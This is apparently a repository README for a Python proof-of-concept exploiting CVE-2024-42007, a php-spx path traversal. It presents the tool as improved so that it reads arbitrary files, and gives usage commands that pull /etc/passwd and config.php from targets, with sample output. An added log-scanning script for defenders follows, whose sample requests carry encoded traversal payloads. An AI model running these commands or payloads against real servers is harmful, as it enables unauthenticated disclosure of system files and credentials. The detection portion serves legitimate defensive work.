Python 3 proof-of-concept for CVE-2024-42007 with actual usability improvements.
Vulnerability Summary:
php-spx <= 0.4.15 suffers from a path traversal vulnerability via the SPX_UI_URI parameter, allowing unauthenticated attackers to read arbitrary files from the server.
The original PoC had a hardcoded detection string (root:x:0:0:root) that only worked for /etc/passwd. If you tried reading PHP files or anything else, it would fail even when the exploit worked.
This version fixes that:
- Removed the detection string requirement - prints output directly
- Added -k parameter for SPX_KEY (defaults to dev)
- Detects HTML error pages and shows proper error messages
- Actually works for reading PHP files, configs, etc.
Basic:
python3 spx.py -t http://192.168.1.100/index.php/ -f /etc/passwd
With custom SPX_KEY:
python3 spx.py -t http://192.168.1.100/index.php/ -f /var/www/html/config.php -k a2a90ca2f9f0ea04d267b16fb8e63800
-t, --target Target URL (required)
-f, --file File to read (default: /etc/passwd)
-k, --key SPX_KEY value (default: dev)
# This actually works now
$ python3 spx.py -t http://target/index.php/ -f /var/www/html/index.php -k mykey
<?php
require_once 'config.php';
// ... rest of file contents
# Wrong key? You'll know
$ python3 spx.py -t http://target/index.php/ -f /etc/passwd
[-] Failed to read file. Got HTML response - incorrect SPX_KEY or file doesn't exist
Based on the original PoC by BubblyCola.
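For defenders, the traversal through SPX_UI_URI described in the summary leaves a trace in web access logs. The following is an added detection example, not part of this repository or the original PoC; it assumes combined-format access logs that record the query string, and the log lines, function names and verdict labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format); not from the page.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Sep/2024:10:00:01 +0000] "GET /index.php/?SPX_KEY=dev&SPX_UI_URI=/ HTTP/1.1" 200 5120
203.0.113.7 - - [01/Sep/2024:10:00:05 +0000] "GET /index.php/?SPX_KEY=dev&SPX_UI_URI=%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1890
198.51.100.4 - - [01/Sep/2024:10:01:10 +0000] "GET /index.php/?SPX_KEY=k1&SPX_UI_URI=%252e%252e%252fvar%252fwww%252fhtml%252fconfig.php HTTP/1.1" 200 64
192.0.2.9 - - [01/Sep/2024:10:02:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 812
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so a double-encoded '..' is still caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client, status, verdict) for requests carrying SPX_UI_URI, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    # parse_qsl performs the first round of percent-decoding
    params = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    if "SPX_UI_URI" not in params:
        return None
    uri = fully_decode(params["SPX_UI_URI"]).replace("\\", "/")
    # A '..' path segment means the request tries to leave the UI asset directory
    verdict = "traversal" if ".." in uri.split("/") else "spx-ui-exposed"
    return client, int(status), verdict

def scan(log_text):
    """Classify every line and keep only the SPX-related hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for client, status, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:15} status={status} client={client}")
```

A `spx-ui-exposed` hit alone is worth following up, since it shows the profiler UI is reachable from the network; a `traversal` hit with status 200 on a host running php-spx 0.4.15 or earlier should be treated as a likely file disclosure.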
